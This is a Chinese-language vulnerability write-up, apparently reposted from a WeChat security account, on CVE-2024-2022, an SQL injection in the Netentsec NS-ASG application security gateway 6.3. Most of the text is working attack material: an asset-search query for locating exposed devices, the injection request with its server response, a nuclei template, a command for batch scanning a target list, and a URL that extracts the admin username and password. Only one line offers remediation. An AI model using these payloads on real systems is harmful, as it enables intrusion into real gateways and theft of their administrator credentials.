免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
01
—
漏洞名称
02 —
漏洞影响
Netentsec NS-ASG Application Security Gateway 6.3版本
03
—
漏洞描述
网康科技的NS-ASG应用安全网关是一款软硬件一体化的产品,集成了SSL和 IPSecQ,旨在保障业务访问的安全性。
Netentsec NS-ASG Application Security Gateway 6.3版本中/admin/list_ipAddressPolicy.php接口处存在SQL注入漏洞。通过操纵参数GroupId可以导致SQL注入攻击,攻击者可远程发起攻击窃取数据。
04
—
app="网康科技-NS-ASG安全网关"
05
—
漏洞复现
向靶场发送如下数据包,计算md5(102103122)
GET/admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e))HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close
响应内容如下
HTTP/1.1200OKConnection: closeContent-Length: 593Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Content-Type: text/htmlDate: Mon, 19 Feb 2024 12:15:56 GMTExpires: Thu, 19 Nov 1981 08:52:00 GMTPragma: no-cacheServer: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0d PHP/5.3.4Set-Cookie: PHPSESSID=c575d7043f874671863f5f5751c99670; path=/X-Powered-By: PHP/5.3.4<html><body>����ѯ�û�����Ϣ : �������ݿ�ʧ��!<br>SELECT GroupName FROM ISCGroupTable WHERE GroupId=-1 UNION ALL SELECT EXTRACTVALUE(1,concat(0x7e,(select md5(102103122)),0x7e))<br>XPATH syntax error: '~6cfe798ba8e5b85feb50164c59f4bec'<ahref="javascript:history.back()">����</a><scriptlanguage="JavaScript">alert("�������ݿ�ʧ��, ��ȷ������!nn��ѯ�û�����ϢnXPATH syntax error: '~6cfe798ba8e5b85feb50164c59f4bec'nSELECT GroupName FROM ISCGroupTable WHERE GroupId=-1 UNION ALL SELECT EXTRACTVALUE(1,concat(00x7e,(select md5(102103122)),0x7e))");history.back();</script><html><body>
其中包含了字符串6cfe798ba8e5b85feb50164c59f4bec漏洞复现成功
06
—
批量漏洞扫描poc
nuclei poc文件内容如下,计算md5(102103122)的值
id: CVE-2024-2022info:name:网康NS-ASG应用安全网关sql注入漏洞author:fgzseverity:highdescription:Netentsec NS-ASG Application Security Gateway 6.3版本中/admin/list_ipAddressPolicy.php接口处存在SQL注入漏洞。通过操纵参数GroupId可以导致SQL注入攻击,攻击者可远程发起攻击窃取数据。metadata::1:app="网康科技-NS-ASG安全网关"verified:truerequests:raw:|+GET/admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1Host:{{Hostname}}:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7:gzip, deflate:zh-CN,zh;q=0.9Connection:closematchers:type: dsldsl:"status_code == 200 && contains(body, '6cfe798ba8e5b85feb50164c59f4bec')"
运行POC
nuclei.exe -t mypoc/cve/CVE-2024-2022.yaml -l data/wangkang.txt07
—
漏洞利用
get请求可以直接通过浏览器访问,获取用户名密码
https://x.x.x.x/admin/list_ipAddressPolicy.php?GroupId=1%20and%20extractvalue(0x1,%20concat(0x1,%20(select%20concat(adminname,%200x7e,%20passwd)%20from%20Admin%20limit%201)))
07
—
修复建议
建议您更新当前系统或软件至最新版,完成漏洞的修复。
原文始发于微信公众号(AI与网安):CVE-2024-2022漏洞复现(POC)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论